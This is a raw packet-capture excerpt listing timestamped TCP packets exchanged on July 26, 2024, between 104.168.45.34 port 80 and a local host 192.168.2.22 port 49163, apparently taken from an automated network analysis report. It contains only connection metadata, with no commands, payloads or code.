                                                        Jul 26, 2024 15:10:47.232352018 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.232369900 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.232410908 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.232412100 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.232701063 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.232718945 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.232733965 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.232760906 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.232760906 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.232795954 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.233660936 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.233679056 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.233721972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.233721972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.234493971 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.234509945 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.234555960 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.234555960 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.235380888 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.235398054 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.235440969 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.235440969 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.310113907 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.310185909 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.310305119 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.310358047 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.310777903 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.310795069 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.310838938 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.310838938 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.311582088 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.311598063 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.311641932 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.311642885 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.312437057 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.312520981 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.312829018 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.312844038 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.312889099 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.312889099 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.313673973 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.313689947 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.313730001 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.313730001 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.314574003 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.314589977 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.314635992 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.315480947 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.315498114 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.315538883 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.315538883 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.316386938 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.316402912 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.316416979 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.316453934 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.316453934 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.317276955 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.317292929 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.317337036 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.317451954 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.318011999 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.318028927 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.318069935 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.318069935 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.318727970 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.318743944 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.318783998 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.318783998 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.319479942 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.319497108 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.319509983 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.319549084 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.319549084 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.319549084 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.320168018 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.320183992 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.320229053 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.320229053 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.320871115 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.320887089 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.320926905 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.320928097 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.321598053 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.321614027 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.321659088 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.321659088 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.322297096 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.322313070 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.322351933 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.322351933 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.323030949 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.323046923 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.323061943 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.323098898 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.323098898 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.323100090 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.323749065 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.323765039 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.323808908 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.323808908 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.324428082 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.324444056 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.324496984 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.324496984 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.325138092 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.325154066 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.325197935 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.325197935 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.325820923 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.325836897 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.325853109 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.325881004 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.325881004 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.325911999 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.326483965 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.326499939 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.326539993 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.326539993 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.327187061 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.327203035 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.327219009 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.327244997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.327244997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.327275038 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.328156948 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.328172922 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.328188896 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.328217030 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.328217030 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.328247070 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.329124928 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.329140902 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.329157114 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.329171896 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.329185009 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.329220057 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.329220057 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.329220057 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.330027103 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.330043077 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.330058098 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.330085039 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.330085993 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.330120087 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.330940962 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.330955982 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.330970049 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.331001997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.331001997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.331803083 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.331818104 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.331832886 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.331847906 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.331866980 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.331866980 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.331897020 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.332756042 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.332771063 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.332786083 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.332815886 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.332815886 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.333898067 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.333913088 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.333926916 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.333941936 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.333956003 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.333986998 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.333986998 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.334347010 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.334362984 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.334378004 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.334408998 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.334530115 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.335160971 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.335177898 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.335223913 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.335223913 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.358577013 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.358664036 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.358779907 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.358794928 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.358839989 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.358870029 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.403011084 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403063059 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403080940 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403084040 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.403115988 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.403115988 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.403567076 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403582096 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403597116 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.403628111 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.403628111 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.404463053 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.404479980 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.404514074 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.404537916 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.404537916 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.404576063 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.405383110 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.405400991 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.405416012 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.405431032 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.405458927 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.405458927 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.405488968 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.406267881 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.406285048 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.406300068 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.406327963 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.406327963 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.406358004 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.407211065 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.407227039 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.407242060 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.407270908 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.407270908 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.408093929 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.408111095 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.408124924 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.408138990 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.408159971 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.408159971 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.408159971 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.408195019 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.408982992 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.408998966 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.409013033 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.409043074 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.409154892 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.409950972 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.409966946 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.409981966 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410010099 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410123110 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410644054 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410660982 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410675049 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410691023 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410703897 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410707951 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.410725117 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410725117 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410758972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.410758972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.411663055 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.411679983 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.411695004 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.411715031 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.411736012 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.411736012 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.411736012 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.411775112 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.412568092 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.412585020 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.412599087 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.412614107 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.412627935 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.412632942 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.412632942 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.412662983 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.412662983 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.413535118 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.413551092 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.413563967 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.413578987 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.413594961 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.413594961 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.413625002 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.413625002 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.414505959 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.414522886 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.414537907 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.414551973 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.414566040 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.414566040 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.414596081 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.414596081 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415493011 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415509939 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415524006 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415539026 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415548086 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415554047 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415570021 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.415574074 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415574074 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415574074 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415595055 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.415612936 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.416419983 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.416436911 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.416451931 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.416471004 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.416495085 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.416495085 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.416495085 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.416537046 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.417401075 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.417418003 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.417431116 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.417445898 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.417460918 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.417463064 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.417463064 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.417494059 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.417494059 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.418420076 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.418436050 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.418447971 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.418462992 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.418477058 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.418498993 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.418498993 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.418528080 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.419153929 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.419171095 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.419184923 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.419199944 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.419214010 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.419214964 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.419214964 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.419235945 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.419235945 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.419267893 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.420002937 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.420025110 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.420038939 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.420053959 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.420069933 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.420069933 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.420099020 CEST4916380192.168.2.22104.168.45.34
